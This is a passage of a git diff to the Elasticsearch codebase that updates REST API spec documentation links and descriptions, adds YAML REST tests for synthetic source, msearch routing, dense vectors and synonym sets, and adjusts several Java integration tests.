b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.start.json @@ -1,8 +1,8 @@ { "watcher.start":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-start.html", - "description":"Starts Watcher if it is not already running." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-start", + "description":"Start the watch service" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stats.json index 35e90cbd1cddb..ad174ab44b1bf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stats.json @@ -1,8 +1,8 @@ { "watcher.stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-stats.html", - "description":"Retrieves the current Watcher metrics." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-stats", + "description":"Get Watcher statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stop.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stop.json index b1a67119df153..d142ba43eec70 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stop.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stop.json @@ -1,8 +1,8 @@ { "watcher.stop":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-stop.html", - "description":"Stops Watcher if it is running." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-stop", + "description":"Stop the watch service" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.update_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.update_settings.json index 5a6a8d4a787ad..6c48a6e201fa0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.update_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.update_settings.json @@ -1,8 +1,8 @@ { "watcher.update_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-update-settings.html", - "description":"Update settings for the watcher system index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-update-settings", + "description":"Update Watcher index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.info.json index 35895f0ddb581..2412307de4f70 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.info.json @@ -1,8 +1,8 @@ { "xpack.info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/info-api.html", - "description":"Retrieves information about the installed X-Pack features." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-info", + "description":"Get information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.usage.json b/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.usage.json index e01f40348eadc..d48a6f3e6f607 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.usage.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.usage.json @@ -1,8 +1,8 @@ { "xpack.usage":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/usage-api.html", - "description":"Retrieves usage information about the installed X-Pack features." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-xpack", + "description":"Get usage information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/indices.recovery/10_basic.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/indices.recovery/10_basic.yml index 8ad06910ebe4d..0724f3831aeab 100644 --- a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/indices.recovery/10_basic.yml +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/indices.recovery/10_basic.yml @@ -17,6 +17,9 @@ indices.recovery: index: [test_1] human: true + ignore_unavailable: false + allow_no_indices: true + expand_wildcards: open - match: { test_1.shards.0.type: "EMPTY_STORE" } - match: { test_1.shards.0.stage: "DONE" } diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/mapping/20_synthetic_source.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/mapping/20_synthetic_source.yml new file mode 100644 index 0000000000000..abc83566d00b8 --- /dev/null +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/mapping/20_synthetic_source.yml @@ -0,0 +1,81 @@ +--- +synthetic_source text as multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: keyword + fields: + text: + type: text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source text with multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: text + fields: + raw: + type: keyword + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/10_basic.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/10_basic.yml index 1052508ca2b88..8ac4ee60f2bbc 100644 --- a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/10_basic.yml +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/10_basic.yml @@ -1,5 +1,7 @@ --- setup: + - requires: + test_runner_features: allowed_warnings - do: index: @@ -67,6 +69,12 @@ setup: rest_total_hits_as_int: true max_concurrent_shard_requests: 1 max_concurrent_searches: 1 + ignore_unavailable: false + ignore_throttled: false + allow_no_indices: false + expand_wildcards: open + include_named_queries_score: false + index: index_* body: - index: index_* - query: @@ -83,6 +91,8 @@ setup: - {} - query: match_all: {} + allowed_warnings: + - "[ignore_throttled] parameter is deprecated because frozen indices have been deprecated. Consider cold or frozen tiers in place of frozen indices." - match: { responses.0.hits.total: 2 } - match: { responses.1.hits.total: 1 } diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/40_routing.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/40_routing.yml new file mode 100644 index 0000000000000..5b69a4da98418 --- /dev/null +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/40_routing.yml @@ -0,0 +1,25 @@ +--- +setup: + - do: + index: + index: index_1 + routing: "1" + id: "1" + body: { foo: bar } + + - do: + indices.refresh: {} + +--- +"Routing": + + - do: + msearch: + rest_total_hits_as_int: true + routing: "1" + body: + - {} + - query: + match_all: {} + + - match: { responses.0.hits.total: 1 } diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/search.vectors/40_knn_search.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/search.vectors/40_knn_search.yml index 75be8d621608e..e617d08940f84 100644 --- a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/search.vectors/40_knn_search.yml +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/search.vectors/40_knn_search.yml @@ -605,6 +605,46 @@ setup: - match: { hits.hits.0._score: $knn_score0 } - match: { hits.hits.1._score: $knn_score1 } - match: { hits.hits.2._score: $knn_score2 } + +--- +"Dimensions are dynamically set": + - do: + indices.create: + index: test_index + body: + mappings: + properties: + embedding: + type: dense_vector + + - do: + index: + index: test_index + id: "0" + refresh: true + body: + embedding: [ 0.5, 111.3, -13.0, 14.8, -156.0 ] + + # wait and ensure that the mapping update is replicated + - do: + cluster.health: + wait_for_events: languid + + - do: + indices.get_mapping: + index: test_index + + - match: { test_index.mappings.properties.embedding.type: dense_vector } + - match: { test_index.mappings.properties.embedding.dims: 5 } + + - do: + catch: bad_request + index: + index: test_index + id: "0" + body: + embedding: [ 0.5, 111.3 ] + --- "Updating dim to null is not allowed": - requires: @@ -630,3 +670,36 @@ setup: properties: embedding: type: dense_vector + + +--- +"Searching with no data dimensions specified": + - requires: + cluster_features: "search.vectors.no_dimensions_bugfix" + reason: "Search with no dimensions bugfix" + + - do: + indices.create: + index: empty-test + body: + mappings: + properties: + vector: + type: dense_vector + index: true + + - do: + search: + index: empty-test + body: + fields: [ "name" ] + knn: + field: vector + query_vector: [ -0.5, 90.0, -10, 14.8, -156.0 ] + k: 3 + num_candidates: 3 + rescore_vector: + oversample: 1.5 + similarity: 0.1 + + - match: { hits.total.value: 0 } diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/synonyms/40_synonyms_sets_get.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/synonyms/40_synonyms_sets_get.yml index 9d6540c118ce5..9ba66d3100eb1 100644 --- a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/synonyms/40_synonyms_sets_get.yml +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/synonyms/40_synonyms_sets_get.yml @@ -157,3 +157,33 @@ setup: - match: count: 12 + +--- +"Return empty rule set": + - requires: + cluster_features: [ synonyms_set.get.return_empty_synonym_sets ] + reason: "synonyms_set get api return empty synonym sets" + + - do: + synonyms.put_synonym: + id: empty-synonyms + body: + synonyms_set: [] + + - do: + synonyms.get_synonyms_sets: {} + + - match: + count: 4 + + - match: + results: + - synonyms_set: "empty-synonyms" + count: 0 + - synonyms_set: "test-synonyms-1" + count: 3 + - synonyms_set: "test-synonyms-2" + count: 1 + - synonyms_set: "test-synonyms-3" + count: 2 + diff --git a/server/build.gradle b/server/build.gradle index be2b43745d0b2..20557aefba731 100644 --- a/server/build.gradle +++ b/server/build.gradle @@ -12,6 +12,8 @@ apply plugin: 'elasticsearch.publish' apply plugin: 'elasticsearch.internal-cluster-test' apply plugin: 'elasticsearch.internal-test-artifact' apply plugin: 'elasticsearch.test-build-info' +apply plugin: 'elasticsearch.transport-version-references' +apply plugin: 'elasticsearch.transport-version-resources' publishing { publications { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/ReloadSecureSettingsIT.java b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/ReloadSecureSettingsIT.java index 83e79ff7f45a8..82a6c1f6acf85 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/ReloadSecureSettingsIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/ReloadSecureSettingsIT.java @@ -27,6 +27,7 @@ import org.elasticsearch.plugins.PluginsService; import org.elasticsearch.plugins.ReloadablePlugin; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.junit.BeforeClass; import java.io.InputStream; @@ -47,6 +48,7 @@ import static org.hamcrest.Matchers.nullValue; @ESIntegTestCase.ClusterScope(minNumDataNodes = 2) +@ESTestCase.WithoutEntitlements // requires entitlement delegation ES-10920 public class ReloadSecureSettingsIT extends ESIntegTestCase { private static final String VALID_SECURE_SETTING_NAME = "some.setting.that.exists"; diff --git a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/node/tasks/TasksIT.java b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/node/tasks/TasksIT.java index b2ba1d34e3280..f9651c71ecf13 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/node/tasks/TasksIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/node/tasks/TasksIT.java @@ -41,7 +41,6 @@ import org.elasticsearch.index.query.QueryBuilders; import org.elasticsearch.persistent.PersistentTasksCustomMetadata; import org.elasticsearch.plugins.Plugin; -import org.elasticsearch.search.SearchService; import org.elasticsearch.search.builder.SearchSourceBuilder; import org.elasticsearch.tasks.RemovedTaskListener; import org.elasticsearch.tasks.Task; @@ -82,6 +81,8 @@ import static java.util.Collections.singleton; import static org.elasticsearch.action.admin.cluster.node.tasks.TestTaskPlugin.TEST_TASK_ACTION; import static org.elasticsearch.action.admin.cluster.node.tasks.TestTaskPlugin.UNBLOCK_TASK_ACTION; +import static org.elasticsearch.action.search.SearchQueryThenFetchAsyncAction.NODE_SEARCH_ACTION_NAME; +import static org.elasticsearch.action.search.SearchTransportService.FREE_CONTEXT_SCROLL_ACTION_NAME; import static org.elasticsearch.core.TimeValue.timeValueMillis; import static org.elasticsearch.core.TimeValue.timeValueSeconds; import static org.elasticsearch.http.HttpTransportSettings.SETTING_HTTP_MAX_HEADER_SIZE; @@ -353,8 +354,6 @@ public void testTransportBulkTasks() { } public void testSearchTaskDescriptions() { - // TODO: enhance this test to also check the tasks created by batched query execution - updateClusterSettings(Settings.builder().put(SearchService.BATCHED_QUERY_PHASE.getKey(), false)); registerTaskManagerListeners(TransportSearchAction.TYPE.name()); // main task registerTaskManagerListeners(TransportSearchAction.TYPE.name() + "[*]"); // shard task createIndex("test"); @@ -380,6 +379,11 @@ public void testSearchTaskDescriptions() { // check that if we have any shard-level requests they all have non-zero length description List shardTasks = findEvents(TransportSearchAction.TYPE.name() + "[*]", Tuple::v1); for (TaskInfo taskInfo : shardTasks) { + // During batched query execution, if a partial reduction was done on the data node, a task will be created to free the reader. + // These tasks don't have descriptions or parent tasks, so they're ignored for this test. + if (taskInfo.action().equals(FREE_CONTEXT_SCROLL_ACTION_NAME)) { + continue; + } assertThat(taskInfo.parentTaskId(), notNullValue()); assertEquals(mainTask.get(0).taskId(), taskInfo.parentTaskId()); assertTaskHeaders(taskInfo); @@ -396,12 +400,12 @@ public void testSearchTaskDescriptions() { taskInfo.description(), Regex.simpleMatch("id[*], size[1], lastEmittedDoc[null]", taskInfo.description()) ); + case NODE_SEARCH_ACTION_NAME -> assertEquals("NodeQueryRequest", taskInfo.description()); default -> fail("Unexpected action [" + taskInfo.action() + "] with description [" + taskInfo.description() + "]"); } // assert that all task descriptions have non-zero length assertThat(taskInfo.description().length(), greaterThan(0)); } - updateClusterSettings(Settings.builder().putNull(SearchService.BATCHED_QUERY_PHASE.getKey())); } public void testSearchTaskHeaderLimit() { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/state/TransportClusterStateActionDisruptionIT.java b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/state/TransportClusterStateActionDisruptionIT.java index 9c5d96166b3d6..3098d1d558f99 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/state/TransportClusterStateActionDisruptionIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/state/TransportClusterStateActionDisruptionIT.java @@ -213,7 +213,6 @@ public void runRepeatedlyWhileChangingMaster(Runnable runnable) throws Exception final String nonMasterNode = randomValueOtherThan(masterName, () -> randomFrom(internalCluster().getNodeNames())); awaitClusterState( - logger, nonMasterNode, state -> Optional.ofNullable(state.nodes().getMasterNode()).map(m -> m.getName().equals(masterName) == false).orElse(false) ); diff --git a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/tasks/PendingTasksBlocksIT.java b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/tasks/PendingTasksBlocksIT.java index 6475e80901ea7..bb048179a437a 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/tasks/PendingTasksBlocksIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/tasks/PendingTasksBlocksIT.java @@ -12,6 +12,7 @@ import org.elasticsearch.common.settings.Settings; import org.elasticsearch.gateway.GatewayService; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.InternalTestCluster; import java.util.Arrays; @@ -22,6 +23,7 @@ import static org.elasticsearch.cluster.metadata.IndexMetadata.SETTING_READ_ONLY; import static org.elasticsearch.cluster.metadata.IndexMetadata.SETTING_READ_ONLY_ALLOW_DELETE; +@ESTestCase.WithoutEntitlements // requires entitlement delegation ES-10920 public class PendingTasksBlocksIT extends ESIntegTestCase { public void testPendingTasksWithIndexBlocks() { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/action/search/TransportSearchIT.java b/server/src/internalClusterTest/java/org/elasticsearch/action/search/TransportSearchIT.java index eab5576707092..89f46bee4b709 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/action/search/TransportSearchIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/action/search/TransportSearchIT.java @@ -12,7 +12,6 @@ import org.apache.lucene.index.LeafReaderContext; import org.apache.lucene.search.ScoreMode; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.DocWriteResponse; import org.elasticsearch.action.admin.cluster.node.stats.NodeStats; @@ -648,7 +647,7 @@ public long bytesToPreallocate() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/cluster/SpecificMasterNodesIT.java b/server/src/internalClusterTest/java/org/elasticsearch/cluster/SpecificMasterNodesIT.java index 5f86111d352a9..5d5f2082fb71f 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/cluster/SpecificMasterNodesIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/cluster/SpecificMasterNodesIT.java @@ -60,13 +60,15 @@ public void testElectOnlyBetweenMasterNodes() throws Exception { logger.info("--> start master node (1)"); final String masterNodeName = internalCluster().startMasterOnlyNode(); - awaitMasterNode(internalCluster().getNonMasterNodeName(), masterNodeName); - awaitMasterNode(internalCluster().getMasterName(), masterNodeName); + for (var nodeName : internalCluster().getNodeNames()) { + awaitMasterNode(nodeName, masterNodeName); + } logger.info("--> start master node (2)"); final String nextMasterEligableNodeName = internalCluster().startMasterOnlyNode(); - awaitMasterNode(internalCluster().getNonMasterNodeName(), masterNodeName); - awaitMasterNode(internalCluster().getMasterName(), masterNodeName); + for (var nodeName : internalCluster().getNodeNames()) { + awaitMasterNode(nodeName, masterNodeName); + } logger.info("--> closing master node (1)"); client().execute( @@ -74,12 +76,14 @@ public void testElectOnlyBetweenMasterNodes() throws Exception { new AddVotingConfigExclusionsRequest(TEST_REQUEST_TIMEOUT, masterNodeName) ).get(); // removing the master from the voting configuration immediately triggers the master to step down - awaitMasterNode(internalCluster().getNonMasterNodeName(), nextMasterEligableNodeName); - awaitMasterNode(internalCluster().getMasterName(), nextMasterEligableNodeName); + for (var nodeName : internalCluster().getNodeNames()) { + awaitMasterNode(nodeName, nextMasterEligableNodeName); + } internalCluster().stopNode(masterNodeName); - awaitMasterNode(internalCluster().getNonMasterNodeName(), nextMasterEligableNodeName); - awaitMasterNode(internalCluster().getMasterName(), nextMasterEligableNodeName); + for (var nodeName : internalCluster().getNodeNames()) { + awaitMasterNode(nodeName, nextMasterEligableNodeName); + } } public void testAliasFilterValidation() { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveCustomsCommandIT.java b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveCustomsCommandIT.java index 2b2dc114e8ffc..e88a08f983b90 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveCustomsCommandIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveCustomsCommandIT.java @@ -18,12 +18,14 @@ import org.elasticsearch.env.Environment; import org.elasticsearch.env.TestEnvironment; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import java.util.Map; import static org.hamcrest.Matchers.containsString; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0, autoManageMasterNodes = false) +@ESTestCase.WithoutEntitlements // commands don't run with entitlements enforced public class RemoveCustomsCommandIT extends ESIntegTestCase { public void testRemoveCustomsAbortedByUser() throws Exception { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveIndexSettingsCommandIT.java b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveIndexSettingsCommandIT.java index 65e325a1291d8..62afa9c57cbaa 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveIndexSettingsCommandIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveIndexSettingsCommandIT.java @@ -21,6 +21,7 @@ import org.elasticsearch.env.TestEnvironment; import org.elasticsearch.plugins.Plugin; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import java.util.Collection; import java.util.List; @@ -31,6 +32,7 @@ import static org.hamcrest.Matchers.not; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0, autoManageMasterNodes = false) +@ESTestCase.WithoutEntitlements // commands don't run with entitlements enforced public class RemoveIndexSettingsCommandIT extends ESIntegTestCase { static final Setting FOO = Setting.intSetting("index.foo", 1, Setting.Property.IndexScope, Setting.Property.Dynamic); diff --git a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveSettingsCommandIT.java b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveSettingsCommandIT.java index d7ed6bb47b98b..1a68211c6ea8e 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveSettingsCommandIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveSettingsCommandIT.java @@ -19,6 +19,7 @@ import org.elasticsearch.env.Environment; import org.elasticsearch.env.TestEnvironment; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import java.util.Map; @@ -27,6 +28,7 @@ import static org.hamcrest.Matchers.not; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0, autoManageMasterNodes = false) +@ESTestCase.WithoutEntitlements // commands don't run with entitlements enforced public class RemoveSettingsCommandIT extends ESIntegTestCase { public void testRemoveSettingsAbortedByUser() throws Exception { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/UnsafeBootstrapAndDetachCommandIT.java b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/UnsafeBootstrapAndDetachCommandIT.java index 6e548f773009f..fc6c72ee86984 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/UnsafeBootstrapAndDetachCommandIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/UnsafeBootstrapAndDetachCommandIT.java @@ -24,6 +24,7 @@ import org.elasticsearch.gateway.PersistedClusterStateService; import org.elasticsearch.node.Node; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.InternalTestCluster; import java.io.IOException; @@ -39,6 +40,7 @@ import static org.hamcrest.Matchers.notNullValue; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0, autoManageMasterNodes = false) +@ESTestCase.WithoutEntitlements // CLI tools don't run with entitlements enforced public class UnsafeBootstrapAndDetachCommandIT extends ESIntegTestCase { private MockTerminal executeCommand(ElasticsearchNodeCommand command, Environment environment, boolean abort) throws Exception { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/discovery/single/SingleNodeDiscoveryIT.java b/server/src/internalClusterTest/java/org/elasticsearch/discovery/single/SingleNodeDiscoveryIT.java index 10f13f6ab152f..e28ab5b5c05d5 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/discovery/single/SingleNodeDiscoveryIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/discovery/single/SingleNodeDiscoveryIT.java @@ -87,7 +87,8 @@ public Path nodeConfigPath(int nodeOrdinal) { 0, "other", Arrays.asList(getTestTransportPlugin(), MockHttpTransport.TestPlugin.class), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); try { other.beforeTest(random()); @@ -137,7 +138,8 @@ public Path nodeConfigPath(int nodeOrdinal) { 0, "other", Arrays.asList(getTestTransportPlugin(), MockHttpTransport.TestPlugin.class), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); try (var mockLog = MockLog.capture(JoinHelper.class)) { mockLog.addExpectation( diff --git a/server/src/internalClusterTest/java/org/elasticsearch/index/IndexSortIT.java b/server/src/internalClusterTest/java/org/elasticsearch/index/IndexSortIT.java index 0e85d2b9750cb..d76b7d0dd250c 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/index/IndexSortIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/index/IndexSortIT.java @@ -11,6 +11,7 @@ import org.apache.lucene.search.Sort; import org.apache.lucene.search.SortField; +import org.apache.lucene.search.SortedNumericSelector; import org.apache.lucene.search.SortedNumericSortField; import org.apache.lucene.search.SortedSetSortField; import org.elasticsearch.common.settings.Settings; @@ -80,6 +81,33 @@ public void testIndexSort() { assertSortedSegments("test", indexSort); } + public void testIndexSortDateNanos() { + prepareCreate("test").setSettings( + Settings.builder() + .put(indexSettings()) + .put("index.number_of_shards", "1") + .put("index.number_of_replicas", "1") + .put("index.sort.field", "@timestamp") + .put("index.sort.order", "desc") + ).setMapping(""" + { + "properties": { + "@timestamp": { + "type": "date_nanos" + } + } + } + """).get(); + + flushAndRefresh(); + ensureYellow(); + + SortField sf = new SortedNumericSortField("@timestamp", SortField.Type.LONG, true, SortedNumericSelector.Type.MAX); + sf.setMissingValue(0L); + Sort expectedIndexSort = new Sort(sf); + assertSortedSegments("test", expectedIndexSort); + } + public void testInvalidIndexSort() { IllegalArgumentException exc = expectThrows( IllegalArgumentException.class, diff --git a/server/src/internalClusterTest/java/org/elasticsearch/index/engine/MergeWithLowDiskSpaceIT.java b/server/src/internalClusterTest/java/org/elasticsearch/index/engine/MergeWithLowDiskSpaceIT.java index c2687468a7f26..1857b7529f6ca 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/index/engine/MergeWithLowDiskSpaceIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/index/engine/MergeWithLowDiskSpaceIT.java @@ -9,30 +9,51 @@ package org.elasticsearch.index.engine; +import org.elasticsearch.action.ActionFuture; +import org.elasticsearch.action.admin.cluster.health.ClusterHealthResponse; import org.elasticsearch.action.admin.cluster.node.stats.NodeStats; import org.elasticsearch.action.admin.cluster.node.stats.NodesStatsResponse; +import org.elasticsearch.action.admin.cluster.reroute.ClusterRerouteUtils; +import org.elasticsearch.action.admin.indices.segments.IndicesSegmentResponse; +import org.elasticsearch.action.admin.indices.segments.ShardSegments; import org.elasticsearch.action.admin.indices.stats.IndicesStatsResponse; +import org.elasticsearch.action.support.broadcast.BroadcastResponse; import org.elasticsearch.cluster.DiskUsageIntegTestCase; import org.elasticsearch.cluster.metadata.IndexMetadata; +import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.cluster.routing.allocation.DiskThresholdSettings; +import org.elasticsearch.cluster.routing.allocation.command.MoveAllocationCommand; +import org.elasticsearch.common.Priority; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.concurrent.EsExecutors; +import org.elasticsearch.core.TimeValue; import org.elasticsearch.index.IndexNotFoundException; import org.elasticsearch.indices.IndicesService; +import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.plugins.PluginsService; +import org.elasticsearch.telemetry.TestTelemetryPlugin; import org.elasticsearch.test.ESIntegTestCase; import org.elasticsearch.threadpool.ThreadPool; import org.junit.BeforeClass; +import java.util.ArrayList; +import java.util.Collection; +import java.util.List; import java.util.Locale; +import java.util.concurrent.TimeUnit; import java.util.stream.IntStream; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertNoFailures; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThan; +import static org.hamcrest.Matchers.iterableWithSize; import static org.hamcrest.Matchers.lessThan; +import static org.hamcrest.Matchers.not; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0) public class MergeWithLowDiskSpaceIT extends DiskUsageIntegTestCase { + private final TimeValue ACCEPTABLE_RELOCATION_TIME = new TimeValue(5, TimeUnit.MINUTES); protected static long MERGE_DISK_HIGH_WATERMARK_BYTES; @BeforeClass @@ -40,7 +61,14 @@ public static void setAvailableDiskSpaceBufferLimit() { // this has to be big in order to potentially accommodate the disk space for a few 100s of docs and a few merges, // because of the latency to process used disk space updates, and also because we cannot reliably separate indexing from merging // operations at this high abstraction level (merging is triggered more or less automatically in the background) - MERGE_DISK_HIGH_WATERMARK_BYTES = randomLongBetween(1_000_000L, 2_000_000L); + MERGE_DISK_HIGH_WATERMARK_BYTES = randomLongBetween(10_000_000L, 20_000_000L); + } + + @Override + protected Collection> nodePlugins() { + List> nodePluginsList = new ArrayList<>(super.nodePlugins()); + nodePluginsList.add(TestTelemetryPlugin.class); + return nodePluginsList; } 